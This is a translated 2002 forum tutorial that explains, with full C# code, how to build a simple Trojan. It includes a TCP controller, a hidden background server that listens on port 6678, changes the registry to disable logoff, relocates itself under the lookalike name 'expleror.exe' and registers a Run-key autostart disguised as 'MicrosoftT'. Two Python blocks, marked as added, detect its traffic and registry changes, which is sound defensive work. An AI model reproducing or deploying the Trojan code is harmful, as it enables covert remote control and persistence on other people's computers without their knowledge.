Earlier I posted the program for a Trojan written in C# (see that program first); sorry that I never wrote up the analysis and kept everyone waiting, so I will make up for it now :).
Preface:
My skills are not great, so if you want to learn Trojan technology there is little inspiration here; this article is meant for friends who are learning C#.
Introduction to Trojans (refer to the Hummer Principles of the Essence of the Habitat, 2000-2001):
Because this program is a Trojan, some basic knowledge about Trojans is introduced first, since these concepts come up in many places below. A complete Trojan system consists of a hardware part, a software part, and a specific connection part. Here we mainly introduce the software part, which consists of the controller program, the Trojan (a background service), and the Trojan configuration. The controller is the program used to remotely control the server; the Trojan is the program that sneaks onto the server; the Trojan configuration is the set of settings, such as port number, trigger condition and Trojan name, that make the Trojan harder to notice.
Technology used:
The controller program sends a control code to control the server; the server runs in the background, and the goal is to modify the registry. The technique is not very difficult; it mainly exercises network programming and registry modification in C#.
Controller development:
The controller sends a control code to the server. After receiving the control code, the server completes the requested operation according to that code, and if the server finishes the job it returns a success message.
Development of the controller:
The control codes can be chosen by yourself and need no detailed explanation; there are a few difficult points.
1. Connection request
Use the System.Net.Sockets.TcpClient class from the .NET class library.
TcpClient(string hostname, int port)
hostname is the name of the host to be controlled; of course, you can also use the IP address.
port is the port number.
// System.EventArgs is the base class for event data classes
private void button7_Click(object sender, System.EventArgs e)
{
    // Record the operation: append the operation information to the RichTextBox control
    richTextBox1.AppendText("Request connection " + textBox1.Text + "\r");
    int port = 6678;
    try
    {
        // Initialize a new instance of the TcpClient class and connect to the specified port on the specified host
        client = new TcpClient(textBox1.Text, port);
    }
    catch
    {
        MessageBox.Show("Server is not online! Check whether you entered the host name.");
        richTextBox1.AppendText("Server is not online! Check whether you entered the host name.");
    }
} // private void button7_Click
2. Test whether the controlled machine is connected. The program sends the control code and checks whether the server reacts; if a reply comes back, the control succeeded.
// Provides the data stream for network access
// private NetworkStream stream;
The code is as follows:
private void button8_Click(object sender, System.EventArgs e)
{
    // Record the operation
    richTextBox1.AppendText("Test connection" + "\r");
    try
    {
        stream = client.GetStream();
        if (stream.CanWrite)
        {
            // Send a control code
            string control = "jiance";
            byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
            stream.Write(by, 0, by.Length);
            // Flush the stream
            stream.Flush();
            // Start the thread that receives the returned data
            // Receive is the function the thread executes, see the analysis below
            threadReceive = new Thread(new ThreadStart(Receive));
            threadReceive.Start();
        }
    }
    catch (Exception ee)
    {
        richTextBox1.AppendText(ee.Message + "\r");
        MessageBox.Show(ee.Message);
    }
}
3. Sending the control code
private void button9_Click(object sender, System.EventArgs e)
{
    // Choose the control code to send; the radioButtons are form controls
    if (radioButton1.Checked) { control = form2.zhucex; }
    else if (radioButton2.Checked) { control = form3.zhuces; }
    else if (radioButton3.Checked) { control = Warring; }
    else if (radioButton4.Checked) { control = suggest; }
    else if (radioButton5.Checked) { control = form4.mumawe; }
    else if (radioButton6.Checked) { control = Drop; }
    if (control == "000000")
    {
        MessageBox.Show("You did not enter any control target! No control signal is sent.");
        richTextBox1.AppendText("You did not enter any control target! No control signal is sent.");
    }
    else if (control != "000000")
    {
        try
        {
            // Record the operation
            richTextBox1.AppendText(control + " is trying to control, waiting for response ..." + "\r");
            stream = client.GetStream();
            if (stream.CanWrite)
            {
                byte[] by = System.Text.Encoding.ASCII.GetBytes(control.ToCharArray());
                stream.Write(by, 0, by.Length);
                stream.Flush();
                threadReceive = new Thread(new ThreadStart(Receive));
                threadReceive.Start();
            } // end if
        } // try
        catch
        {
            richTextBox1.AppendText("Server is not connected; the control is not valid!" + "\r");
            MessageBox.Show("Server is not connected; the control is not valid!" + "\r");
        }
    } // else if
}
4. Thread execution function
private void Receive()
{
    // Set up the buffer that receives the data
    byte[] bb = new byte[3];
    // Read 3 bytes; i is the number of bytes actually read
    int i = stream.Read(bb, 0, 3);
    // Convert to a string; for a Chinese control code use
    // string ss = System.Text.Encoding.Unicode.GetString(bb);
    string ss = System.Text.Encoding.ASCII.GetString(bb);
    // Return codes I set on the server: hjc means the connection test succeeded, hkz means the control succeeded
    if (ss == "hjc")
    {
        MessageBox.Show("Connection success");
        richTextBox1.AppendText("Connection success");
    }
    if (ss == "hkz")
    {
        richTextBox1.AppendText(control + " control success" + "\r");
        MessageBox.Show(control + " control success" + "\r");
    }
}
Service development:
To implement the Trojan service program, the main functions to realize are: running in the background (the hiding technique), receiving the control code, and modifying the registry. These three aspects are introduced below:
1. In VC#, building a background service program is very easy. Create a new C# Windows application; the project name is up to you (but to stay hidden, use a name that resembles system names). Set the form property ShowInTaskbar to false so that it does not appear in the taskbar when running, and set the WindowState property to Minimized so that the form is hidden. Of course, you can also set these in InitializeComponent(); this function performs the initialization and runs before the form is displayed. The code is as follows:
private void InitializeComponent()
{
    //
    // Form1
    //
    // Form scaling base size and client size
    this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
    this.ClientSize = new System.Drawing.Size(368, 357);
    // Form name
    this.Name = "Form1";
    // Set the properties that keep the form out of sight
    this.ShowInTaskbar = false;
    this.Text = "Form1";
    this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2. Receiving the control code must begin as soon as the server starts running, so the listening thread must be started during program initialization; therefore it is placed in the form's constructor. The annotated code is as follows:
public Form1() // Form constructor
{
    //
    // Required for Windows Form Designer support
    //
    InitializeComponent();
    //
    // TODO: Add any constructor code after InitializeComponent call
    //
    // Add your listening code here
    // The port can be chosen freely; I use a fixed port
    int port = 6678;
    // System.Net.Sockets.TcpListener listens for connections from TCP network clients
    listener = new TcpListener(port);
    // Start listening
    listener.Start();
    // Add the thread that receives the control code; to stop the thread, Thread.Abort() can be used
    // ReControlCode is the function the thread starts executing; it selects the appropriate
    // registry modification function according to the control code received
    Thread thread = new Thread(new ThreadStart(ReControlCode));
    thread.Start();
}
The ReControlCode function is as follows (see the full program for the rest):
private void ReControlCode()
{
    // Set up the receiving socket; listener.AcceptSocket returns the client request that has already been received
    socket = listener.AcceptSocket();
    // If the connection succeeded
    while (socket.Connected)
    {
        // Receive the control code
        byte[] by = new byte[6];
        int i = socket.Receive(by, by.Length, 0);
        string ss = System.Text.Encoding.ASCII.GetString(by);
        // Perform different functions according to the control code
        // Modify the registry according to the code
        switch (ss)
        {
            case "jiance": // Test connection, return the test information
                string str = "hjc";
                byte[] bytee = System.Text.Encoding.ASCII.GetBytes(str);
                socket.Send(bytee, 0, bytee.Length, 0);
                break;
            case "ZX1000":
                // Registry modification function, self-defined, see the analysis below
                UnLogoff();
                // Return the control message
                RetMessage();
                break;
            case "ZX0100":
                // Registry modification function
                UnClose();
                // Return the control message
                RetMessage();
                break;
            // The remaining cases follow the same pattern and are omitted
            default:
                break;
        } // switch
    } // while
} // private void ReControlCode
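The exchange between the controller (sections 2 to 4 above) and ReControlCode is a fixed-string protocol: the server reads exactly 6 bytes and compares the whole buffer against its case labels, and the controller reads exactly 3 bytes for the reply. That rigidity is what makes the traffic easy to recognise on the wire. The following added example, which is not part of the original article, classifies TCP segment records against the port, codes and replies the article's code uses and reports sessions where a command was answered. The segment records are constructed; a real detector would work on reassembled streams rather than single segments.

```python
# Added example (not from the article): flag this tool's fixed-string control
# protocol in TCP segment records. Port, codes and replies are the ones the
# article's controller and server code use; the segment records are constructed.

CONTROL_PORT = 6678  # fixed port used by both sides in the article

# 6-byte client codes the server's switch recognises (the server reads exactly 6 bytes)
CLIENT_CODES = {
    b"jiance": "connection test",
    b"ZX1000": "registry change: NoLogoff policy (UnLogoff)",
    b"ZX0100": "registry change (UnClose)",
}
# 3-byte server replies (the controller's Receive reads exactly 3 bytes)
SERVER_REPLIES = {
    b"hjc": "test acknowledged",
    b"hkz": "control acknowledged",
}


def classify_segment(src_port, dst_port, payload):
    """Return (direction, meaning) if a segment matches the protocol, else None.

    Matching is exact on the whole payload: the server compares the 6-byte
    buffer as a string, so a padded or split code would not be accepted by it either.
    """
    if dst_port == CONTROL_PORT and payload in CLIENT_CODES:
        return ("to-server", CLIENT_CODES[payload])
    if src_port == CONTROL_PORT and payload in SERVER_REPLIES:
        return ("from-server", SERVER_REPLIES[payload])
    return None


def find_sessions(segments):
    """Group matching segments by (client, server) and report each session.

    A session is 'confirmed' when a client code was answered by a server reply,
    which is the exchange the article's Receive/ReControlCode pair performs.
    """
    sessions = {}
    for src, sport, dst, dport, payload in segments:
        hit = classify_segment(sport, dport, payload)
        if hit is None:
            continue
        direction, meaning = hit
        pair = (src, dst) if direction == "to-server" else (dst, src)
        sessions.setdefault(pair, []).append((direction, meaning))
    alerts = []
    for (client, server), events in sessions.items():
        sent = any(d == "to-server" for d, _ in events)
        acked = any(d == "from-server" for d, _ in events)
        alerts.append({"client": client, "server": server,
                       "events": events, "confirmed": sent and acked})
    return alerts


# Constructed segment records: (src, sport, dst, dport, payload)
SAMPLE_SEGMENTS = [
    ("10.0.0.5", 40000, "10.0.0.9", 6678, b"jiance"),              # test request
    ("10.0.0.9", 6678, "10.0.0.5", 40000, b"hjc"),                 # test reply
    ("10.0.0.5", 40000, "10.0.0.9", 6678, b"ZX1000"),              # NoLogoff command
    ("10.0.0.9", 6678, "10.0.0.5", 40000, b"hkz"),                 # control reply
    ("10.0.0.7", 40001, "10.0.0.9", 6678, b"GET / HTTP/1.0\r\n"),  # unrelated, same port
    ("10.0.0.7", 40002, "10.0.0.9", 80, b"jiance"),                # right string, wrong port
]

if __name__ == "__main__":
    for alert in find_sessions(SAMPLE_SEGMENTS):
        print(alert)
```

Running the block on the constructed records reports one session between 10.0.0.5 and 10.0.0.9 with four matching events and confirmed set, while the HTTP request on the same port and the "jiance" string sent to port 80 are ignored. The exact-match rule mirrors the server's own behaviour, so it produces few false positives, but it also means a detector must see whole payloads, which is why stream reassembly matters in practice.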
3. For registry operations in C#, use the Microsoft.Win32 namespace in the .NET class library, which provides two kinds of classes: classes that handle events raised by the operating system, and classes for working with the system registry. Its usage can be seen below. Here I wrote a subroutine that modifies the registry so that the computer cannot be logged off. Before that, you should understand the registry: under the subkey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,
setting the value NoLogoff to 1 makes the computer unable to log off. The following function uses C# to implement the registry modification:
private void UnLogoff()
{
    // Get the top-level node of the host's registry
    Microsoft.Win32.RegistryKey rlocal = Registry.LocalMachine;
    // Declare a variable for a registry subkey
    RegistryKey key1 = null;
    try
    {
        // RegistryKey.OpenSubKey(string name, bool writable) retrieves the specified subkey
        // name is the subkey specified by the user; writable == true allows modification. The default, false, is read-only
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", true);
        // Set the value name and data under the subkey
        key1.SetValue("NoLogoff", 1);
        // Close the opened subkey
        key1.Close();
        // Build the warning string
        mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff was modified! Please set it back to 0!";
    }
    catch { }
    // If the subkey does not exist, create it
    if (key1 == null)
    {
        try
        {
            // Use RegistryKey.CreateSubKey(string subkey) to create the subkey you want
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
            key2.SetValue("NoLogoff", 1);
            key2.Close();
            mystr = mystr + "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer value NoLogoff was modified! Please set it back to 0!";
        }
        catch { }
    }
}
4. An important function of a Trojan program is self-replication and relocation. The Trojan must automatically hide itself in SYSTEM or SYSTEM32 to avoid discovery. The relocation code is analysed below; its main function is to move the Trojan from winnt\system\Msdoss.exe to winnt\system32\expleror.exe, changing its name in the process. It uses the .NET namespace System.IO, whose role is to allow synchronous and asynchronous reading and writing of data streams and files; here we use the System.IO.File class.
private void movec1()
{
    try
    {
        // File.Move(string sourceFileName, string destFileName) moves a file
        // sourceFileName is the file to move; destFileName is its new path and name
        File.Move("c:\\winnt\\system\\Msdoss.exe", "D:\\winnt\\system32\\expleror.exe");
    }
    catch { }
    // Make the moved Trojan start automatically; the analysis is the same as above
    try
    {
        key1 = rlocal.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        key1.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
        key1.Close();
    }
    catch { }
    if (key1 == null)
    {
        try
        {
            RegistryKey key2 = rlocal.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
            key2.SetValue("MicrosoftT", "D:\\winnt\\system32\\expleror.exe");
            key2.Close();
        }
        catch { }
    }
} // movec1()
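The two registry changes in sections 3 and 4, NoLogoff=1 under Policies\Explorer and an autostart value under the Run key, are exactly what an administrator looks for when checking a machine for this kind of program. The following added example, which is not from the article, parses a Windows registry export in .reg text format and reports both: the policy value when it is set to 1, and every Run entry, marking those whose file or value name matches the lookalike names this article uses. The export text is constructed for the example; the key paths, value names and file names are the ones from the code above.

```python
# Added example (not from the article): audit a Windows registry export (.reg
# text) for the two changes the article's service makes: NoLogoff=1 under
# Policies\Explorer and an autostart value under the Run key. The export text
# below is constructed for this example; the lookalike names are the article's.
import re

POLICY_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
RUN_KEY = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
# File and value names the article uses to blend in with Windows binaries
LOOKALIKE_EXES = {"expleror.exe", "msdoss.exe"}
LOOKALIKE_VALUE_NAMES = {"microsoftt"}

SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLogoff"=dword:00000001

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftT"="D:\\winnt\\system32\\expleror.exe"
"VMware Tools"="C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe"
"""


def parse_reg_export(text):
    """Parse .reg text into {key_path_lower: {value_name: (type, value)}}.

    Handles the two value forms that matter here: "name"="string" (with the
    .reg backslash escaping undone) and "name"=dword:hex. Other forms are kept raw.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()  # registry key paths are case-insensitive
            keys[current] = {}
            continue
        m = re.match(r'^"((?:[^"\\]|\\.)+)"=(.*)$', line)
        if m is None or current is None:
            continue
        name, rhs = m.group(1), m.group(2)
        if rhs.startswith("dword:"):
            keys[current][name] = ("dword", int(rhs[len("dword:"):], 16))
        elif len(rhs) >= 2 and rhs.startswith('"') and rhs.endswith('"'):
            keys[current][name] = ("string", re.sub(r"\\(.)", r"\1", rhs[1:-1]))
        else:
            keys[current][name] = ("raw", rhs)
    return keys


def audit(keys):
    """Report the NoLogoff policy and every Run autostart entry, marking lookalikes."""
    findings = []
    for name, (vtype, value) in keys.get(POLICY_KEY.lower(), {}).items():
        if name.lower() == "nologoff" and vtype == "dword" and value == 1:
            findings.append({"kind": "policy",
                             "detail": "NoLogoff=1 under Policies\\Explorer: Log Off is disabled"})
    for name, (vtype, value) in keys.get(RUN_KEY.lower(), {}).items():
        if vtype != "string":
            continue
        exe = value.lower().rsplit("\\", 1)[-1]
        lookalike = exe in LOOKALIKE_EXES or name.lower() in LOOKALIKE_VALUE_NAMES
        findings.append({"kind": "autostart", "name": name,
                         "path": value, "lookalike": lookalike})
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg_export(SAMPLE_EXPORT)):
        print(finding)
```

On the constructed export this yields three findings: the policy value, the MicrosoftT entry pointing at expleror.exe flagged as a lookalike, and the VMware Tools entry reported but not flagged. Reporting every Run entry rather than only the flagged ones is deliberate: the name list is specific to this article, and an inventory of all autostart values is what lets a reviewer spot a name that is not on any list.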
That is the simple C# Trojan. If you have any questions, please come to the C# or .NET board of the www.vchelp.net forum to discuss them with me, or email me at chenweijun_sh@tang.com; of course you can also contact me through Black Defense. Deciduous summer day
2002-07-29